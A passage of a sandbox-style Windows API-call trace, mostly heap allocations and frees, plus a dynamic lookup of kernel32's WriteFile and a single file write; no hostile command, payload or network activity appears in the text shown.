dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.234] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0077.234] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0077.235] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0077.235] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0077.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0077.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906c0 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0077.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690910 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.235] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690770 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0077.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908e0 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad30 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.236] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0077.237] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0077.237] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0077.237] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0077.237] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0077.237] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0077.237] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.238] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0077.238] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.238] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0077.238] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.238] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0077.238] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.239] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0077.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0077.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.242] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0077.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e540, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0077.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.243] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0077.243] WriteFile (in: hFile=0x128, lpBuffer=0x6a1b20*, nNumberOfBytesToWrite=0x5c46, lpNumberOfBytesWritten=0x61e598, lpOverlapped=0x0 | out: lpBuffer=0x6a1b20*, lpNumberOfBytesWritten=0x61e598*=0x5c46, lpOverlapped=0x0) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0077.244] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0077.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.245] PeekMessageW (in: 